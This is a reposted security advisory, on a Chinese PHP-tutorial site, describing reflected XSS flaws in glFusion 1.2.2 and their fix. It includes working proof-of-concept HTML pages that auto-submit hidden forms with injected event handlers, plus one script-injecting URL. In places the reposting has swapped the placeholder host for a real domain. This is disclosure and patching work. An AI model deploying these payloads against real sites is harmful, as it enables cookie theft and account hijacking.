网站地图    收藏   

主页 > 后端 > 网站安全 >

glFusion 1.2.2 多个xss缺陷及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 影响产品: glFusion开发者: http://www.glfusion.org/缺陷影响版本: 1.2.2 and probably prior已测试版本: 1.2.2Advisory Details:High-Tech Bridge Security Research Lab discovered multiple ......

影响产品: glFusion
开发者: http://www.glfusion.org/
缺陷影响版本: 1.2.2 and probably prior
已测试版本: 1.2.2
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.
 
glFusion has a "bad_behaviour" plugin (installed by default) that verifies HTTP Referer, aimed to protect against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction PoC (Proof-of-Concept) codes for vulnerabilities 1.1 – 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1) .
 
 
1) Multiple Cross-Site Scripting (XSS) in glFusion: CVE-2013-1466
 
1.1 The vulnerability exists due to insufficient filtration of user-supplied data in "subject" HTTP POST parameter passed to "/profiles.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The PoC code below uses "alert()" JavaScript function to display user's cookies:
 
 
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http://[host]/profiles.php" method="post">'
            html += '<input type="hidden" name="uid" value="2">'
      html += '<input type="hidden" name="author" value="author">'
      html += '<input type="hidden" name="message" value="1">'
      html += '<input type="hidden" name="message_html" value="1">'
      html += '<input type="hidden" name="authoremail" value="mail@mail.com">'
      html += '<input type="hidden" name="postmode" value="html">'
      html += '<input type="hidden" name="what" value="contact">'
      html += '<input type="hidden" name="subject" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in "address1", "address2", "calendar_type", "city", "state", "title", "url", "zipcode" HTTP POST parameters passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in user’s browser in context of the vulnerable website.
 
The PoC code below uses "alert()" JavaScript function to display user's cookies:
 
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http://[host]/calendar/index.php" method="post">'
            html += '<input type="hidden" name="mode" value="Submit">'
            html += '<input type="hidden" name="savecal" value="Submit">'
      html += '<input type="hidden" name="address1" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'   
      html += '<input type="hidden" name="calendar_type" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
      html += '<input type="hidden" name="city" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
      html += '<input type="hidden" name="state" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
      html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
      html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
      html += '<input type="hidden" name="zipcode" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' 
      html += '<input type="hidden" name="address2" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.3 The vulnerabilities exists due to insufficient filtration of user-supplied data in "title" and "url" HTTP POST parameters passed to "/links/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The PoC code below uses "alert()" JavaScript function to display user's cookies:
 
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http:// www.2cto.com /links/index.php" method="post">'
            html += '<input type="hidden" name="mode" value="Submit">'
      html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(1);"\'>'   
      html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(2);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.4 The vulnerability exists due to insufficient filtration of user-supplied data in URI after "/admin/plugins/mediagallery/xppubwiz.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The PoC code below uses "alert()" JavaScript function to display user's cookies:
 
http://www.2cto.com /admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/
 
-----------------------------------------------------------------------------------------------
 
解决方案:
 
升级到 glFusion v1.2.2.pl4
 
More Information:
http://www.glfusion.org/article.php/glf122_update_20130130_01
http://www.glfusion.org/filemgmt/viewcat.php?cid=1
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论